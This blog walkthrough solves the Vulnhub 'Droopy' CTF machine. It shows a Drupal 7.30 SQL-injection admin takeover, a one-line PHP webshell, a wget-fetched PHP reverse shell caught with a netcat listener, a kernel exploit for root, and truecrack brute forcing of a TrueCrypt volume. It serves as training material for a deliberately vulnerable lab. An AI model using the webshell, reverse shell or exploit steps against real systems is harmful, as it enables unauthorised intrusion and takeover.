Vulnhub: Droopy: v0.2 walkthrough

Another brand new VM off Vulnhub, this time it’s made by knightmare and came with two hints on how to approach the vulnerable machine: 1) Grab a copy of the rockyou wordlist, 2) It’s fun to read other people’s email. Sounds like a blast – lets begin!

As always I used ’netdiscover’ to find the IP of the server, followed by 'nmap' to see which ports were open and to get a general impression of what kind of server this is:

nmap -sV 192.168.1.32 -O -A

nmapping droopy

Only Port 80 is open, and it seems to be running Apache 2.4.7 with Drupal 7 on a Linux of some sort. Lets see what the websites have to offer. Nmap gave away a couple of files, including a robots.txt and CHANGELOG.txt. The first one seems to be the standard Drupal robots.txt, but the CHANGELOG.txt revealed that it was running Drupal version 7.30.

I fired up ‘dirb’, and it found a couple of other interesting files. Not knowing a lot about Drupal, I decided to check several of them in an attempt to find further information. One of the interesting files '/info.php' was a PHP script with phpinfo() output that revealed, that the server is running PHP 5.5.9-1, and it thinks that its hostname is droopy.knight139.co.uk.

Drupal 7.30 seems a bit old, the new one is 8.1.0, so I figured that I would try and let my old friend ‘searchsploit’ help to see if there were any known exploits for this popular CMS. Turns out that there is a few that could be applied to Drupal earlier than 7.32, so I decided to try “Drupal Core <= 7.32 - SQL Injection (PHP)”, located in ./php/webapps/34993.php (CVE-2014-3704). This one can be used to change the admin username and password (both will be set to ‘admin’) by SQL-injection. Funny how 16 lines of code can be used to compromise a popular CMS. The SQL-injection worked, and I was able to login to the admin-interface of the CMS.

Drupal admin login

I browsed around in the Drupal administration interface for a little while, and saw that there was an option to enable a PHP filter, thereby allowing PHP to be embedded in posts. I enabled the filter, and tried with my simple webshell:

<pre><?php system($_GET[‘c’]);?></pre>

Drupal webshell

... and it gave me a directorylisting, so I'm basically halfway in. Time to get a proper shell via netcat. For this purpose I used the php-reverse-shell that comes with Kali Linux, and managed to upload it directly to the server using my simple webshell and ‘wget’. Being unable to write to /var/www/html – I decided to upload the file to /tmp and then start to search for a location inside the webscope that I could copy the PHP-script to afterwards:
wget upload and move

A writeable path inside the webscope was found at /var/www/html/sites/default/files/, so I again used my very simple webshell to move the script to the new location:
move the file

Next was to spawn a listener with netcat, and call the URL with curl http://192.168.1.32/sites/default/files/reverse.php (or opening it in a browser) to activate the reverse shell.

nc -l -n -v -p 4444

got the shell!

BOOYAH! I was in, and now I needed to find a way to escalate my privileges from the www-data user to root.

I got root by using an exploit for CVE-2015-1328 (37292.c in Kali Linux), and kind of expected that this was the end of this VM, but boy was I wrong. In the /root directory there was no flag.txt, instead there was a ‘dave.tc’ file, a file for TrueCrypt. The hints did say to use the rockyou dictionary file, but I thought I got around that somehow, I guess I didn’t. Let’s see if we can brute force this sucker.

got root

Copied the file to the webroot of the VM and downloaded it to my Kali Linux, so I could brute force it there instead of the in the Droopy server.

Truecrack was my first choice of tool for this task, the hints said to use the “rock you” wordlist, but I thought I’d try with the password for the MySQL-server which I found earlier in the Drupal configuration file, unfortunately without luck. When running Truecrack, there are three different key types that can be used: ripemd160, sha512 and whirlpool. I took a qualified guess, and picked sha512, as that was the one I would have used myself.

truecrack --truecrypt ./dave.tc --key sha512 --wordlist rockyou.txt

While Truecrack was running, I continued browsing around the filesystem on the server, and found a mail from Dave to George. Dave tells George that he updated the encrypted file and set a new password – this gives a few hints, which didn’t ring a bell for me. But I started looking into the band “The Jam” and what songs they’ve done and generated a wordlist from those and tried with Truecrack, no luck once again. Also tried to grep all the words with ‘hat’ from rockyou.txt, since the word ‘hat’ somehow caught my eye in the previously mentioned mail – still no luck.

mail-from-dave

So after having spent 2-3 hours on brute forcing with Truecrack and rockyou.txt, and still not being able to find the password, I thought I’d ask if anyone else had completed it, just to make sure that I was on the right track - and since I didn't want to spend hours and hours running through the rockyou list. One of the testers of the VM was rasta_mouse from #Vulnhub, and he gave me a hint to move in the right direction. Make no mistake, the answer is in rockyou.txt, but it will take a long time to run through almost 15 million different combinations 🙂

I was close to the right solution, when I was looking for ‘hat’ inside the rockyou.txt wordfile, but the right word to search for was “academy” - this was also inside the mail from Dave to George. Next I made a wordlist with all the words that contained academy, and used that with TrueCrack.

cat rockyou.txt | grep -i academy > wordlist.txt
truecrack --truecrypt ./dave.tc --key sha512 --wordlist wordlist.txt

This speeded things up a bit, and it found the needed password for the TrueCrype volume. Since TrueCrypt is no longer a part of Kali, I had to install the new VeraCrypt instead, which can also be used to open TrueCrypt volumes as long as you set it in TrueCrypt mode with the '-tc' flag.

veracrypt -tc dave.tc

veracrypt

After Veracrypt is done doing its thing, the TrueCrypt volume is mounted in the destination, which in my case was ./crypt (you need to create the mountpoint first) and I am able to browse around. There’s a few images in a couple of folders, but the important part is in ./secret/.top/flag.txt which shows a nice banner and a message.

Mission accomplished!

Conclusion:

This was another fun CTF VM, that surprised me a bit with the TrueCrypt volume, as I already thought I was done after getting root. Even though it's always more fun to solve stuff like this yourself, this time it was really nice that I was able to get a hint from rasta_mouse in #Vulnhub, else this challenge would most likely have taken me 10 more hours of brute forcing 🙂

As a sidenote: The first thing I tried after installing the VM, was to try and login with root and the password 'toor' this worked for some reason. But since SSH was not enabled on the server, it obviously wasn't the way to go.

Leave a Reply

Your email address will not be published. Required fields are marked *